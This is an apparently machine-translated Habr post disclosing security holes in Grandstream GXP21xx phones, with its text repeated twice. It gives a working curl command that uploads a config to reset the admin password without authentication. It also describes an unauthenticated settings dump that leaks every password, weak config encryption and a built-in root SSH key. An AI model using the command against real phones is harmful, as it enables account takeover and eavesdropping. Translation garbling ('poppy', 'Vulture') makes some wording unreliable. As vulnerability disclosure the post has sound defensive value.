Vulnerabilities and backdoors in Grandstream phones
I want to share a couple of serious vulnerabilities that I found in the Grandstream handsets.
Studying the web interface of gxp21xx colored phones to study their api, I came across a script for uploading a config to the phone, this is the script / cgi-bin / upload_cfg
Unlike other scripts, this script is not passed the sessionid, but only the file is passed. A quick check through curl showed that indeed, you can use this script without authorization:
')
The config.txt file is a text file with a set of parameters of the form: =
Having filled the file with one line “P2 = admin”, we change the admin password on the phone, after which we can log in to the web interface.
There are similar scripts on the phone for loading a wolpaper, phone book, etc.
This vulnerability is present in the phones gxp2130, gxp2140 and gxp2160
The next vulnerability is even worse than the first. It was already discovered after receiving root access to the phone and analyzing scripts in cgi-bin.
This is the / cgi-bin / dumpsettings script, here’s its contents:
As you can see this miracle, the script simply sends the output of the nvram show command | grep -v: STR without any hint of authorization. And nvram contains many interesting parameters, besides the config itself. And of course there are all the passwords in open form: admin and SIP accounts.
This vulnerability is in most grandstream devices (and maybe all), including gateways.
In addition to xml configs, when provisioning, the phone can use an encrypted text configuration. The utility for creating such a config can be downloaded on the grandstream website. The first thing that is alarming, when using this utility, is that it does not ask for any encryption password. On the phone, the dec_config_dec utility is used to decrypt the config, which only needs a poppy to decrypt. Thus, there is no problem decoding the config. And some voip providers are confident in the reliability of encryption and put such configs in open access (for proving the phones of their clients). By a simple search of poppy addresses, one of the American voip providers managed to download about five hundred configs with a Vulture account inside.
I decided to search for backdoors in one firmware. The dropbear reverse engineering banarnik showed that it is possible to log in via ssh not only under the admin user, but also under the root user, using the key. Public Key is carefully located in the firmware along the path /rom/.ssh/authorized_keys
So the owners of the private key can log in via ssh. And if you get root access to a phone, you can, for example, listen to conversations, or even just listen to what is happening around the phone, even outside the conversation.
These vulnerabilities can be found not one application, it can be:
On the Internet, I discovered a large number of phones that look to the Internet with their web interface, where the vulnerabilities listed above are well exploited.
Well, if you don’t want to wait for a new firmware with closed vulnerabilities (the support from the grandstream is very tight), then you can cut out the vulnerable scripts from the firmware yourself, as described here .
1. Download arbitrary config to phone
Studying the web interface of gxp21xx colored phones to study their api, I came across a script for uploading a config to the phone, this is the script / cgi-bin / upload_cfg
Unlike other scripts, this script is not passed the sessionid, but only the file is passed. A quick check through curl showed that indeed, you can use this script without authorization:
')
curl -i -F name="config.txt" -F file="@config.txt;type=text/plain" -H "Content-Disposition: form-data; name=file; filename=config.txt" http://xx.xx.xx.xx/cgi-bin/upload_cfg The config.txt file is a text file with a set of parameters of the form: =
Having filled the file with one line “P2 = admin”, we change the admin password on the phone, after which we can log in to the web interface.
There are similar scripts on the phone for loading a wolpaper, phone book, etc.
This vulnerability is present in the phones gxp2130, gxp2140 and gxp2160
2. Dump phone config
The next vulnerability is even worse than the first. It was already discovered after receiving root access to the phone and analyzing scripts in cgi-bin.
This is the / cgi-bin / dumpsettings script, here’s its contents:
#!/usr/bin/haserl #!/bin/ash <? RESULT=`nvram show | grep -v :STR` HEADER="Content-Type: text/plain\r\n\r\n" HEADER="Expires: $(date)\r\n$HEADER" HEADER="Content-disposition: attachment; filename=settings.cfg\r\n$HEADER" HEADER="Cache-Control: no-cache, must-revalidate\r\n$HEADER" echo -en $HEADER echo "$RESULT" ?> As you can see this miracle, the script simply sends the output of the nvram show command | grep -v: STR without any hint of authorization. And nvram contains many interesting parameters, besides the config itself. And of course there are all the passwords in open form: admin and SIP accounts.
This vulnerability is in most grandstream devices (and maybe all), including gateways.
3. Encrypted config
In addition to xml configs, when provisioning, the phone can use an encrypted text configuration. The utility for creating such a config can be downloaded on the grandstream website. The first thing that is alarming, when using this utility, is that it does not ask for any encryption password. On the phone, the dec_config_dec utility is used to decrypt the config, which only needs a poppy to decrypt. Thus, there is no problem decoding the config. And some voip providers are confident in the reliability of encryption and put such configs in open access (for proving the phones of their clients). By a simple search of poppy addresses, one of the American voip providers managed to download about five hundred configs with a Vulture account inside.
4. Backdoor from Grandstream
I decided to search for backdoors in one firmware. The dropbear reverse engineering banarnik showed that it is possible to log in via ssh not only under the admin user, but also under the root user, using the key. Public Key is carefully located in the firmware along the path /rom/.ssh/authorized_keys
So the owners of the private key can log in via ssh. And if you get root access to a phone, you can, for example, listen to conversations, or even just listen to what is happening around the phone, even outside the conversation.
These vulnerabilities can be found not one application, it can be:
- Banal theft of vulture uchetok
- Substitution of the name of the caller through the phone book
- Sip server substitution in order to intercept traffic and wiretapping
- Downloading malicious software to the phone system, for example, for recording from a microphone or for making any attacks
On the Internet, I discovered a large number of phones that look to the Internet with their web interface, where the vulnerabilities listed above are well exploited.
Well, if you don’t want to wait for a new firmware with closed vulnerabilities (the support from the grandstream is very tight), then you can cut out the vulnerable scripts from the firmware yourself, as described here .
Source: https://habr.com/ru/post/250403/
All Articles